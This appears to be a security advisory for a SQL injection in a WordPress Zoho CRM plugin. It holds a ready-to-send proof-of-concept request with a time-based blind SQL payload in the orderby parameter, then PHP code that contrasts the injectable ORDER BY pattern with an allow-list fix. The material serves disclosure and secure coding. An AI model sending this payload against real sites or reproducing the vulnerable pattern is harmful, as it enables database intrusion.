The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admin.
1. Send a GET request to /wp-admin/admin.php?page=vxcf_zoho&id=&tab=logs&search=&order=desc&orderby=crm_id%2c(select*from(select(sleep(10)))a)&vx_tab_action_vxcf_zoho=&object=&status=&time=&start_date=&end_date=
2. Observe SQLi
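The root cause described above is an ORDER BY clause assembled from request parameters. The following is an added illustration, not the plugin's own code: the injectable pattern next to the allow-list fix. The table name, sortable column names and the `manage_options` capability are assumed for the example.

```php
<?php
// Added example (not the plugin's code). Table and column names are assumed.

// VULNERABLE: column and direction are interpolated straight into the SQL.
// Identifiers cannot be bound as prepared-statement values, so without an
// allow-list a value such as "crm_id,(select ...)" is executed as SQL.
function vx_logs_query_vulnerable( $orderby, $order ) {
    global $wpdb;
    $table = $wpdb->prefix . 'vxcf_logs'; // assumed table name
    return "SELECT * FROM {$table} ORDER BY {$orderby} {$order}";
}

// HARDENED: untrusted input only selects from a fixed set of identifiers,
// with a safe default; the one real value (LIMIT) is bound via $wpdb->prepare().
function vx_logs_query_safe( $orderby, $order, $limit = 50 ) {
    global $wpdb;
    $table = $wpdb->prefix . 'vxcf_logs'; // assumed table name

    $allowed_columns = array( 'id', 'crm_id', 'status', 'time' ); // assumed sortable columns
    $column    = in_array( $orderby, $allowed_columns, true ) ? $orderby : 'id';
    $direction = ( 'ASC' === strtoupper( (string) $order ) ) ? 'ASC' : 'DESC';

    return $wpdb->prepare(
        "SELECT * FROM {$table} ORDER BY {$column} {$direction} LIMIT %d",
        absint( $limit )
    );
}

// Admin-page handler: gate on capability first, then normalise the inputs
// before they reach the query builder.
function vx_render_logs_tab() {
    if ( ! current_user_can( 'manage_options' ) ) { // assumed required capability
        wp_die( 'Insufficient permissions' );
    }

    $orderby = isset( $_GET['orderby'] ) ? sanitize_key( wp_unslash( $_GET['orderby'] ) ) : 'id';
    $order   = isset( $_GET['order'] ) ? sanitize_key( wp_unslash( $_GET['order'] ) ) : 'desc';

    global $wpdb;
    $rows = $wpdb->get_results( vx_logs_query_safe( $orderby, $order ) );

    foreach ( (array) $rows as $row ) {
        echo '<div>' . esc_html( $row->crm_id ) . '</div>'; // assumed column
    }
}
```

`sanitize_key()` alone would strip the comma and parentheses from the payload on this page, but it is not the control to rely on: the allow-list is what guarantees that only known identifiers can ever appear after ORDER BY, regardless of how the input was filtered upstream. Because the injection point is an identifier, `$wpdb->prepare()` cannot protect it directly, which is why the fix maps input onto constants instead of binding it.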